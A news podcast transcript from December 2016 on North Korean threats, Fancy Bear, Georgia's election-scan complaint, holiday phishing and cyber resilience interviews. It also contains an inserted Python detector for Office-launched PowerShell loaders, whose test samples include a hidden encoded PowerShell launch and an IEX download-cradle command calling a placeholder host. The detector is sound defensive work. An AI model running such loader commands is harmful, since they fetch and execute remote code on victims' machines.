CyberWire Daily - Daily & Week in Review: Korean cyber alert amid a presidential impeachment. Germany calls out Fancy Bear for influence ops. Georgia—the Dixie one, not the one in the Caucasus—demands a cyber explanation. Holiday phishing, the enduring DDoS threat, and
Episode Date: December 9, 2016
In today's podcast, South Korea braces for the North to take cyber advantage of a constitutional crisis, but so far all's quiet. (Or most is quiet, anyway.) Germany takes official notice that Fancy Bear is working to disrupt next year's elections. The US state of Georgia thinks DHS may have tried to penetrate its election system post-election, and it wants to know what's up. ISIS is back online, and calling for attacks against Americans and Shiites. A phishing campaign trolls customer service reps with fileless malware. Experts expect more Mirai-driven DDoS. Rick Howard from Palo Alto Networks tells about the Cybersecurity Canon. Caleb Barlow from IBM Security explains the importance of a well practiced resiliency plan. And the Avalanche criminal kingpin is on the lam after being sprung from a Ukrainian jail. Learn more about your ad choices. Visit megaphone.fm/adchoices
Transcript
Discussion (0)
You're listening to the Cyber Wire Network, powered by N2K.
...stay home with her young son. But her maternal instincts take a wild and surreal turn as she
discovers the best yet fiercest part of herself. Based on the acclaimed novel, Night Bitch is a
thought-provoking and wickedly humorous film from Searchlight Pictures. Stream Night Bitch January
24 only on Disney+.
Hey everybody, Dave here. Have you ever wondered where your personal information is lurking online?
Like many of you, I was concerned about my data being sold by data brokers.
So I decided to try DeleteMe.
I have to say, DeleteMe is a game changer.
Within days of signing up, they started removing my personal information from hundreds of data brokers.
I finally have peace of mind knowing my data privacy is protected.
DeleteMe's team does all the work for you with detailed reports so you know exactly what's been done.
Take control of your data and keep your private life private by signing up for DeleteMe.
Now at a special discount for our listeners, today get 20% off your DeleteMe plan when you go to joindeleteme.com slash n2k and use promo code n2k
at checkout. The only way to get 20% off is to go to joindeleteme.com slash n2k and enter code
n2k at checkout. That's joindeleteme.com slash n2k, code N2K at checkout.
South Korea braces for the North to take cyber advantage of a constitutional crisis,
but so far it's mostly quiet.
Germany takes official notice that Fancy Bear is working to disrupt next year's elections.
The U.S. state of Georgia thinks DHS may have tried to penetrate its election system post-election,
and it wants to know what's up.
A phishing campaign trolls customer service reps with fileless malware.
Experts expect more Mirai-driven DDoS.
And the Avalanche criminal kingpin is on the lam after being sprung from a Ukrainian jail.
I'm Dave Bittner in Baltimore with your CyberWire summary and week in review for Friday, December 9, 2016.
Seoul is on alert for cyberattacks from the North
as the Republic of Korea goes through the impeachment of its president.
President Park Geun-hye must step down today, at least temporarily,
until her position is finally decided by the Constitutional Court
as required by South Korean law.
Recently disclosed intrusions into South Korean defense networks
continue to look like
Pyongyang's work, and the Republic of Korea is preparing for more. But so far, cyberspace has
remained relatively quiet across the 38th parallel.
As the U.S. Congress continues to rumble about investigating Russian attempts to influence last month's elections
(and the smart bipartisan money is betting that there will be investigations),
Germany's BfV has confirmed that the Russians are up to much the same in Germany.
The BfV said yesterday in an official statement that the Russian organs, specifically Fancy
Bear, also known as APT28, have begun their attempts to disrupt the coming year's German
elections.
The BfV's statement leads with charges of propaganda, disinformation, and false flag operations.
The two Russian objectives, as the BfV explains them, have a familiar ring to them.
Fancy Bear aims to foster uncertainty in German society
and weaken or even destabilize the Federal Republic.
The other goal is to strengthen the hand and amplify the voice
of extremist groups and parties in Germany. Back in the U.S., the state of Georgia has asked that
the Department of Homeland Security explain what Georgia thinks looks like attempts by DHS
to penetrate the state's election systems on November 15, a week after the elections were
held. Georgia was one of a few states that declined DHS security help for the election,
and the state said it did so on constitutional grounds,
not wishing to let the federal camel push its nose into the tent of powers reserved to the states.
A letter Georgia's Secretary of State sent yesterday to the U.S. Secretary of Homeland Security
put the issue this way,
quote,
The private sector security provider that monitors the agency's firewall detected a large
unblocked scan event on November 15th at 8.43 a.m. The event was an IP address attempting to scan
certain aspects of the Georgia Secretary of State's infrastructure. The attempt to breach
our system was unsuccessful. At no time has my office agreed to or permitted DHS to conduct...
The letter asks, in effect, if the attempt was by DHS, and if so, whether it was authorized, inadvertent, or deliberate but unauthorized.
WSBTV2 Atlanta received this statement from DHS.
Quote, The Department of Homeland Security has received Secretary Kemp's letter. We are looking into the matter.
DHS takes the trust of our public and private sector partners seriously,
and we will respond to Secretary Kemp directly.
End quote.
The private sector security provider who detected and blocked the penetration has not been identified.
ISIS is back online, calling on its adherents to kill Shiites and Americans in Bahrain.
U.S. Secretary of Defense Carter's regional visit apparently inspired the attempt at murderous inspiration.
Security firm Proofpoint warns of a new criminal phishing campaign that loads an information
stealer in its victim systems. Called August, the campaign resembles in some of its techniques
recent capers Trustwave researchers
have observed the Carbanak gang executing. Proofpoint is tracking the threat actors behind
August under the designation TA530, and they're calling their info stealer mundane, but they note
that it's being deployed in a way that makes it difficult to detect. It uses well-crafted emails
to customer service representatives that carry plausible subject lines, like duplicate charges, erroneous charges, shopping cart emptied,
things like that. Should the customer service rep open the attachment, typically a malicious
Word document, August uses a PowerShell script to filelessly install the info stealer.
It's worth noting that PowerShell exploitation is consistent with what Symantec has
observed in a recent study. 94.5% of PowerShell script, Symantec says, is malicious.
So why has August become so prominent in November and December, and why are the Carbanak hoods so
active? Michael Patterson, CEO of Plixer International, told the CyberWire that the
question practically answers itself.
"'Tis the ideal season for phishing attacks," he said.
When you're scrambling to process orders and deliver good customer service during the busiest of online shopping seasons,
it's fatally easy to click open when you should have clicked delete.
Patterson recommends more training, monitoring, and awareness during the holiday season.
We would add that while prudence, diligence, and vigilance are of course always vital,
don't be too hard on yourself or your service reps.
After all, opening email from customers is probably a big part of the job.
So take a look at ways of organizing your systems for security,
and in particular, look for ways of doing without attachments.
Here's one recommendation from Patterson that even a relatively small business could follow.
Set up somewhere for employees
to forward suspicious emails for inspection.
Distributed denial-of-service attacks
remain an unsolved problem,
especially since the general availability
of Mirai-herded Internet-of-Things botnets
has commodified DDoS attacks' capability
and put it within the range of even modestly
talented skids. The skids can even buy tech support services to help them along.
DDoS is also seeing a round of gamification in the Sledgehammer campaign being run in the
apparent interest of Ottoman revival. Travis Smith, senior security research engineer at
Tripwire, told us, quote, ...
In the cops and robbers department,
the Avalanche criminal cloud and fraud-as-a-service gang may have been raided and taken down, but its alleged kingpin is back on the lam.
Ukrainian authorities have called a be-on-the-lookout for Gennady Kapkanov, who was captured in a shootout, cuffed, booked, jailed, and then released on a judge's order because of some local prosecutorial oversight.
You can easily find the galoot's mugshot on the internet.
Mr. Kapkanov is now in parts unknown.
We doubt he'll show up in Bug Tussle or Rabbit Hash or even Timonium,
Cliffside Park or Simi Valley anytime soon.
But if you see him, assume he's armed and dangerous.
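The August chain described in the phishing segment above (a Word attachment that launches PowerShell to install the info stealer without dropping a file on disk) is exactly the kind of thing a SOC can catch from process-creation telemetry rather than from the attachment itself. The following is an added example, not code from the CyberWire, Proofpoint, or Symantec. The log format, the field names, the sample events, and the list of suspicious PowerShell arguments are constructed for illustration and resemble, but are not, real Sysmon Event ID 1 records.

```python
"""
Detecting an Office-to-PowerShell loader from process-creation events.
Added example; not from the CyberWire, Proofpoint, or Symantec.
The key="value" event format and the sample events below are constructed
to resemble Windows process-creation logs, not captured from a real host.
"""
import re
from dataclasses import dataclass

# Parent processes that should rarely, if ever, launch a script host.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Command-line features common to fileless PowerShell loaders (assumed, generic list).
SUSPICIOUS_ARGS = [
    (r"-(?:e|enc|encodedcommand)\b", "encoded command"),
    (r"-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"-(?:ep|executionpolicy)\s+bypass", "execution policy bypass"),
    (r"downloadstring|downloadfile|invoke-webrequest|iwr\b|net\.webclient", "download cradle"),
    (r"\biex\b|invoke-expression", "invoke-expression"),
]


@dataclass
class ProcEvent:
    parent_image: str
    image: str
    command_line: str


def parse_event(line):
    """Parse the constructed key="value" log line into a ProcEvent."""
    fields = dict(re.findall(r'(\w+)="([^"]*)"', line))
    return ProcEvent(fields.get("ParentImage", ""),
                     fields.get("Image", ""),
                     fields.get("CommandLine", ""))


def basename(path):
    """Lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def score_event(ev):
    """Return the list of reasons an event looks like a fileless loader (empty if benign)."""
    reasons = []
    parent, child = basename(ev.parent_image), basename(ev.image)
    # Parent/child relationship: a document opened in Office should not spawn a script host.
    if parent in OFFICE_PARENTS and child in SCRIPT_HOSTS:
        reasons.append(f"{parent} spawned {child}")
    # Command-line features: only inspected for PowerShell hosts.
    if child in {"powershell.exe", "pwsh.exe"}:
        cmd = ev.command_line.lower()
        for pattern, label in SUSPICIOUS_ARGS:
            if re.search(pattern, cmd):
                reasons.append(label)
    return reasons


def detect(lines):
    """Run every line through the scorer; return (child image, reasons) for each hit."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        reasons = score_event(ev)
        if reasons:
            alerts.append((basename(ev.image), reasons))
    return alerts


# Constructed sample events: one macro-style loader, one benign admin script,
# one benign Office child (print spooler helper), one download cradle from cmd.exe.
SAMPLE_EVENTS = [
    'EventID="1" ParentImage="C:\\Program Files\\Microsoft Office\\WINWORD.EXE" '
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell.exe -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"',
    'EventID="1" ParentImage="C:\\Windows\\explorer.exe" '
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell.exe -File C:\\scripts\\backup.ps1"',
    'EventID="1" ParentImage="C:\\Program Files\\Microsoft Office\\WINWORD.EXE" '
    'Image="C:\\Windows\\splwow64.exe" CommandLine="splwow64.exe 12288"',
    'EventID="1" ParentImage="C:\\Windows\\System32\\cmd.exe" '
    'Image="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" '
    'CommandLine="powershell -ep bypass -c IEX (New-Object Net.WebClient).DownloadString(\'http://example.invalid/a\')"',
]

if __name__ == "__main__":
    for image, reasons in detect(SAMPLE_EVENTS):
        print(image, "->", "; ".join(reasons))
```

The parent/child check is the durable part of this rule: encoded and hidden-window flags change from campaign to campaign, but a customer service rep's Word document has no business launching a script host, so that relationship alone is worth an alert even when the command line is clean. The benign Word child (splwow64.exe) and the administrator's unencoded backup script show that the rule does not fire on ordinary activity.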
Do you know the status of your compliance controls right now?
Like, right now.
We know that real-time visibility is critical for security,
but when it comes to our GRC programs, we rely on point-in-time checks.
But get this, more than 8,000 companies like Atlassian
and Quora have continuous visibility into their controls with Vanta. Here's the gist. Vanta brings
automation to evidence collection across 30 frameworks, like SOC 2 and ISO 27001.
They also centralize key workflows like policies, access reviews, and reporting,
and help you get security questionnaires done
five times faster with AI.
Now that's a new way to GRC.
Get $1,000 off Vanta
when you go to vanta.com slash cyber.
That's vanta.com slash cyber for $1,000 off.
Cyber threats are evolving every second, and staying ahead is more than just a challenge.
It's a necessity.
That's why we're thrilled to partner with ThreatLocker,
a cybersecurity solution trusted by businesses worldwide.
ThreatLocker is a full suite of solutions designed to give you total control,
stopping unauthorized applications, securing sensitive data,
and ensuring your organization runs smoothly and securely.
Visit ThreatLocker.com today to see how a default
deny approach can keep your company safe and compliant.
Joining me once again is Rick Howard. He's the CSO at Palo Alto Networks.
He also heads up Unit 42, which is their threat intel team.
Rick, at Unit 42, you have something that you all call the Cybersecurity Canon.
That's your required reading list.
Tell us a little bit about the Cybersecurity Canon.
Yeah, we did this.
It started about three years ago.
I went to the RSA conference in San Francisco and presented a talk on here are some books
that you should have read by now.
It was about 25 books that I thought were kind of necessary to all of us.
And Palo Alto Networks decided to sponsor it.
So what we did is we created a rock and roll hall of fame for cybersecurity books.
We have an outside committee of 10 cybersecurity experts. There are CISOs and journalists and consultants and lawyers, and they evaluate all the books on our candidate list. And
if you go to the website and look up Canon and Palo Alto Networks, you'll see all the books
that are in the candidate list. And you can't get on the list. This is not just a book list,
right? This is someone has made the case in a book review saying why all of us should have read this book by now.
And so there's some sweat and tears put into this to make those cases.
So we have, like I said, about 50, 60 books on the candidate list so far.
And every year the committee selects two or three to be inducted into the Hall of Fame.
Last year we put a bunch of them through because there were so many that were so good.
Future Crimes by Marc Goodman, Kingpin by Kevin Poulsen, Cyber War by Richard Clarke,
and a bunch of others that you would have heard of.
So it's very exciting that we get to do this here at Palo Alto Networks.
And so what are some of the additions to this year's list?
So there are three I'd like to highlight.
The first one I want to mention is a book that I really thought was exciting.
It's called The Phoenix Project.
It's been out for a little bit, and it is a novel that describes what DevOps is.
Now, I know everybody around our community has heard of DevOps and even think you know what it is. But the Phoenix Project is a story that will make you fully understand why DevOps is important,
why it is probably one of the best innovations in IT management since the personal computer was invented,
and how you might go about using those kind of techniques in your own organization.
I guess the second one I would really put on everybody's radar is the Hacking Exposed series.
These books have been around for a long time.
They cover lots of ground about all the aspects of cybersecurity
that we should know about.
So I highly recommend that all the network defenders in the world
take a look at that series of books.
All right, Rick, thanks again for joining us.
You bet. Anytime.
My guest today is Caleb Barlow.
He's a vice president with IBM Security and led the development of IBM's new X-Force Command,
which they call the world's most sophisticated cyber simulation environment.
IBM Security recently published a report titled The Global Cyber Resiliency Gap.
You know, we went out and found that more than 67% of organizations reported
that they weren't prepared to recover from cyber attacks.
Now, that's a sobering stat in and of itself until you get to the next one, which is that 75% have no formal response plan applied across their organization.
So, you know, I think part of what we found in this survey, which covered 2,000 security and IT professionals from around the world, is that as security professionals, a lot of folks have been focused on protecting and defending their environment, which is certainly important.
But now it's just as important to focus on what happens when you inevitably are breached.
How do you respond and how do you maintain that resiliency?
I think we hear that phrase, you know, it's not a matter of if, it's a matter of when, so much these days that it's almost a catchphrase.
Do you agree with that? We certainly have to plan for it to be in the case of when.
You know, it's no different than planning for what happens if there's a fire in our corporate headquarters
or an earthquake or, you know, some major economic downturn.
Just like anything else that we have a business resiliency plan for,
we need to have a business resiliency plan for cyber risk.
And to that point, the survey said that over half of the organizations had at least one data breach
in the past two years.
Yeah, 53% came back and said that they had had one in the past two years, right?
And what was interesting about that was it was everything
from advanced attackers to 74% said that they faced threats due to human error in the last year,
right? So, you know, that could be malicious activity or in many, if not most cases,
that's accidental activity or it's the quintessential case of someone clicking on a
link in a phishing email that they probably shouldn't have.
Take me through some of the reasons why people aren't doing a better job with this.
Well, you know, I think when we look at kind of cyber resiliency in general, first of all, you know, I think a lot of folks don't realize that when you're breached, you have to make a lot of decisions in near real time.
And these are
decisions that could have long lasting implications. This requires a leadership in crisis type of skill.
And, you know, that's not necessarily a muscle that a lot of C-level executives exercise on a
regular basis. So we want to be able to make sure we've practiced and rehearsed that well before something actually happens.
It's everything from who's in charge, how am I going to communicate,
how am I going to deal with regulators, with law enforcement, with my customers,
what am I going to say and how am I going to say it?
Because as much as your data might be on the line from the attackers,
so too is your business reputation with your customers, your business partners, and the public in general.
Yeah, I mean, it reminds me of, you know,
even at the family level, you know, it's sort of how you gather your family together and say,
here's what we do in case there's a fire, you know, ahead of time. Because by the time you
smell smoke, it's too late, right?
Well, it is. And just like you would have that conversation
with your family on, all right, here's how we exit the house, here's where we're all going to gather up.
I mean, I think, unfortunately, you know, the analogy to a fire drill is very important.
And one of the things we're doing at IBM is we've invested $200 million this year in incident response. And one of those key things here in Cambridge, Massachusetts,
is the first ever cyber range built out at full scale for the corporate enterprise.
These types of environments have existed in the past in kind of military and military contractors,
but this is a new environment where people can actually practice these types of breaches
and their response at scale.
So take me through how that works. If I'm an organization that wants to take
advantage of something like that, what would happen?
Well, what they do is they come with their team, not two or three people, but
you know, 10 to 20 people, and not just the security folks, the marketing team,
the legal team, the CEO, maybe a board member or two. And what we do is we put them through
a fictitious breach on a fictitious company. But this is done with a level of realism
in such a way that everything around them, from the videos, the audio, the keyboards that are in
front of them, is so highly realistic that we want to get their pulse raised
up. We want to force them to make some decisions under pressure so that they are experiencing it
much like if it was their own company. The only difference in this case is that the company isn't
real, but all the data is real. And we do this by having a large data center behind us, and
we effectively build out the IT environment of a Fortune 500 company.
The only difference in this case is we hack it and break it every day.
It's, frankly, a lot like a flight simulator.
When it comes to having plans, when it comes to being resilient against these sorts of attacks,
what kind of general advice do you have for people?
Well, I mean, obviously, have a plan, right?
Have rehearsed
that plan. But also, you want to go have relationships with all of the people that
you're going to need to bring in, whether it's the incident response team that you want to have
on retainer, your crisis communications team, your legal counsel. But also, you know, you want to
understand what are the regulatory environments in which you operate.
In the United States, for example, there are 47 different breach disclosure laws in the 50 U.S.
states. You want to have those playbooks already built to understand what do you need to disclose,
to whom, and how. It's just like the proverbial binder you'd see on the shelf in any office around what
to do in case of a medical emergency or a fire. You need that virtual binder built for what to do
in the event of a cyber attack.
That's Caleb Barlow from IBM. You can find the Global Cyber
Resilience Gap Survey and learn more about IBM's Cyber Range on the IBM Security website.
And now, a message from Black Cloak.
Did you know the easiest way for cyber criminals to bypass your company's defenses is by targeting your executives and their families
at home. Black Cloak's award-winning digital executive protection platform secures their
personal devices, home networks, and connected lives. Because when executives are compromised
at home, your company is at risk. In fact, over one-third of new members discover they've already been breached. Protect your executives and their families 24-7, 365 with Black Cloak.
Learn more at blackcloak.io.
And that's The Cyber Wire.
We are proudly produced in Maryland by our talented team of editors and producers.
I'm Dave Bittner. Thanks for listening.
Your business needs AI solutions that are not only ambitious, but also practical and adaptable. Thank you. Pure AI agents connect, prepare, and automate your data workflows, helping you gain insights,
receive alerts, and act with ease through guided apps tailored to your role.
Data is hard. Domo is easy. Learn more at ai.domo.com. That's ai.domo.com.